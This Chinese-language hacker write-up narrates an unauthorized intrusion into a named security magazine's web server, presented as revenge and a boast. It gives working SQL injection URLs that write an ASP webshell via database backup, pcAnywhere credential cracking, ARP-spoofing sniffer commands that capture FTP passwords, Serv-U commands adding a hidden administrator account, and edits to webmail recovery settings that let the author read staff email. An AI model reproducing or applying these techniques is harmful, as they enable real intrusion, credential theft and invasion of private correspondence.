By xiaolu

前言:不是我有意想搞你，而是你们有些过分了，拿着别人的稿子去卖钱，拿着别人的技术装点自己，这也无所谓。你们那种优越感让我不得不提醒你们一下，你们的优越是建立在别人付出之上的。

一、扫描，发现开着ftp。。。。。没常见漏洞。。。。。决定arp欺骗，进行嗅探。

二、找嗅探主机:

C:\>ping www.hacker.com.cn

Pinging www.hacker.com.cn [211.157.102.239] with 32 bytes of data:

开始扫描 211.157.102.1-211.157.102.255 80+1433 端口,找到一个默认目录的站，然后找注入漏洞。

http://xx.xx.xx.xx/111.asp?id=3400 and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'))

发现不是sa权限:

http://xx.xx.xx.xx/111.asp?id=3400 and 1=(select name from master.dbo.sysdatabases where dbid=7)

得到库名ku1:

来吧，想办法搞个shell(此处感谢臭要饭的的资料)，不理解的，多看看网上资料：

http://xx.xx.xx.xx/111.asp?id=3400;create table [dbo].[xiaolu] ([xiaoxue][char](255));--

http://xx.xx.xx.xx/111.asp?id=3400;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into xiaolu (xiaoxue) values(@result);--

http://xx.xx.xx.xx/111.asp?id=3400 and (select top 1 xiaoxue from xiaolu)=1

得到了web路径d:\xxxx,接下来：

http://xx.xx.xx.xx/111.asp?id=3400;use ku1;--

http://xx.xx.xx.xx/111.asp?id=3400;create table cmd (str image);--

http://xx.xx.xx.xx/111.asp?id=3400;insert into cmd(str) values ('');--

http://xx.xx.xx.xx/111.asp?id=3400;backup database ku1 to disk='D:\xxxx\l.asp';--

(关于这种shell的利用,请参见最小的asp后门的动画http://666w.cn/down/view.asp?id=754)

上传..............shell,准备提升权限......,发现pcanywhere,找到：

C:/Documents and Settings/All Users/Application Data/Symantec/pcAnywhere/PCA.xxx.CIF

流光破解密码，pcanywhere连接，看来上天比较帮助我，一切顺利，admin密码和pcanywhere密码一样，：）,tracert 一下：

1 <10 ms <10 ms <10 ms 211.157.102.239

唉，该当黑防有此劫，可以进行arp欺骗。（关于arp欺骗，网上很多资料,bbs.666w.cn/dispbbs.asp?boardID=7&ID=764&page=1）

用webshell上传我们需要的软件：

WinPcap.exe arpsniffer.exe pv.exe

arpsniffer.exe ------------ 57 k 榕哥的交换环境下嗅探工具

pv.exe ----------------60k (PrcView附带的一个命令行程序,华军有下)杀进程

WinPcap.exe ------------------678k 嗅探所用到的一个驱动程序

安装WinPcap.exe,下一步，下一步，完成。

建立一个隐藏的虚拟目录(怎么建立自己去查资料)，应用程序保护设为低 以便于我们用webshell运行arp程序，不然被管理员发现可就不好。

三、开始嗅探：

OK，继续........开始SNIFFER........由于目前中国网络结构和相关技术人员素质等问题.这个可以说是百发百中，运行：

arpsniffer.exe 211.157.102.254 211.157.102.239 21 c:\111.txt 1

211.157.102.254是网关，211.157.102.239是黑防ip,c:\111.txt是log文件,1是网卡id

接下来要做什么?当然就是等了.......不过我们不想等几天时间.我们希望能再顺利些.告诉朋友行动起来,帮我一下，帮我告诉黑防编辑,你的站被黑了………

结果不用说了.几分钟后我拿到了ftp密码，因为arpsniffer进程在运行我们没法直接看，于是用webshell运行：

pv -k -f arpsniffer.exe

kill这个进程，看密码喽~~~~~~

四、工作中：

上传shell,呀！没做安全,盘全部可以浏览，目标在e:\wwwroot,提升全限,利用serv-u，呀怎么不能运行程序呀，呀，原来cmd.exe改成king.exe了呀，net.exe改成了net1king.exe呀，继续 fpipe -v -l 3041 -r 43958 127.0.0.1

添加ftp用户,设为管理员，登陆运行

quote site exec net1king xiaolu xiaoxue /add

quote site exec net1king localgroup administrators xiaolu /add

3389登陆，呀，不行呀，继续

quote site exec net1king xiaolu xiaoxue@@!#!@#@!!@#@123 /add

quote site exec net1king localgroup administrators xiaolu /add

哈哈，还作了密码限制，进去了。接下来我就不说了，让黑防编辑头疼去吧。。。。。。。。（此处省略N多内容）

看看有什么好东西吧，发现有webeasymail服务器哦.看信，看看让编辑们牛比的了不得的资料，不知道密码怎么看呀。

嘿嘿，跟我来：D:/mail/mail/，每个用户目录下都有UserWeb.ini

打开，修改

questionInfo = 1

answerInfo = 1

hintInfo = 1

打开http://hacker.com.cn/mail---忘记密码，添上我们的问题和答案，挖靠，这么多信，有没有没什么好东西啊

该撤退了，剩下的留给编辑们去搞吧。

五：总结：

本次入侵历时1个小时左右，没有什么高深的技术，都是些比较浅显的技术，嗅探渗透是好几年前的技术了，sql注入是比较流行的方法，也不算新了，能这么快得到ftp密码多亏了朋友的“社会工程学”的运用。